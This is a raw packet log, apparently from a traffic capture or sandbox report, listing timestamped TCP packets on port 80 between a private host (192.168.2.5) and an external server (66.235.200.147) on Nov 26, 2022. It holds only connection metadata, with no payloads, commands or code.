Nov 26, 2022 11:17:42.449137926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449147940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449162960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449172974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449187040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449202061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449202061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449202061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449214935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449227095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449239969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449263096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449265003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449279070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449287891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449311018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449312925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449327946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449337959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449362040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449373007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449373007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449385881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449398041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449410915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449424028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449435949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449457884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449461937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449476004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449487925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449512005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449512959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449537039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449538946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449538946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449558020 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449561119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449585915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449609995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449615955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449635983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449645042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449661016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449666977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449686050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449701071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449824095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.466552019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.466597080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.466628075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.466670990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.466697931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.466727018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.466757059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.466788054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.466815948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.466820002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.466849089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.466850042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.466849089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.466906071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.466933966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.466936111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.466965914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.466996908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467025995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467056036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467086077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467116117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467144966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467175007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467204094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467233896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467263937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467293978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467324018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467354059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467356920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.467358112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.467385054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467394114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.467417002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467432976 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.467447996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467473984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.467478037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467504025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467535019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467565060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467593908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467624903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467653990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467684031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467715025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467744112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467772007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467803955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467822075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.467822075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.467822075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.467833042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467858076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.467864990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467895031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467900038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.467921019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.467924118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467955112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.467963934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.467983961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468000889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468014002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468025923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468044043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468065977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468072891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468091011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468103886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468128920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468133926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468147039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468163013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468183994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468194962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468210936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468224049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468246937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468269110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468291044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468312979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468343019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468362093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468369007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468398094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468405008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468405962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468446016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468447924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468482971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468522072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468535900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468561888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468571901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468599081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468611956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468640089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468648911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468678951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468691111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468718052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468728065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468755960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468769073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468795061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468820095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468836069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468843937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468875885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468888044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468914986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468925953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468952894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.468964100 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.468991995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469006062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469031096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469041109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469069004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469080925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469108105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469119072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469146967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469157934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469186068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469197989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469223976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469234943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469263077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469274998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469301939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469315052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469341993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469352961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469377041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469393969 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469415903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469430923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469454050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469464064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469494104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469504118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469532967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469543934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469571114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469599009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469609022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469620943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469647884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469660044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469686031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469696999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469723940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469738007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469763994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469773054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469803095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469814062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469844103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469855070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469882965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469893932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469921112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469933033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469959974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.469970942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.469999075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.470009089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.470036983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.470047951 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.470077038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.470089912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.470118046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.470125914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.470156908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.470174074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.470196009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.470202923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.470235109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.470247030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.470273972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.470283031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.470313072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.470324039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.470352888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.470361948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.470401049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.487339973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487382889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487418890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487442017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.487454891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487473965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.487490892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487499952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.487523079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.487524986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487557888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487557888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.487576008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.487593889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487616062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.487627983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487644911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.487662077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487672091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.487696886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487725019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487751961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487785101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487806082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.487822056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487842083 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.487857103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487884998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.487889051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487909079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.487922907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487940073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.487956047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.487976074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.487989902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488007069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488023996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488038063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488056898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488076925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488090038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488106012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488123894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488140106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488157988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488183975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488192081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488202095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488224983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488243103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488259077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488275051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488295078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488310099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488327980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488344908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488362074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488379955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488396883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488420010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488430023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488442898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488467932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488480091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488501072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488518000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488535881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488557100 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488570929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488590956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488629103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488641024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488671064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488688946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488713026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488729000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488754988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488769054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488797903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488811016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488842964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488851070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488886118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488895893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488929033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.488938093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.488970995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489003897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489012003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489023924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489054918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489064932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489095926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489109039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489137888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489154100 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489181042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489192009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489223957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489233017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489267111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.489276886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.489308119 CET	80	49707	66.235.200.147	192.168.2.5
